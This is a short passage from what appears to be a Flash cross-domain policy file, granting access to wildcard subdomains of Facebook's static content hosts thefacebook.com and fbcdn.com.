   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
&nbs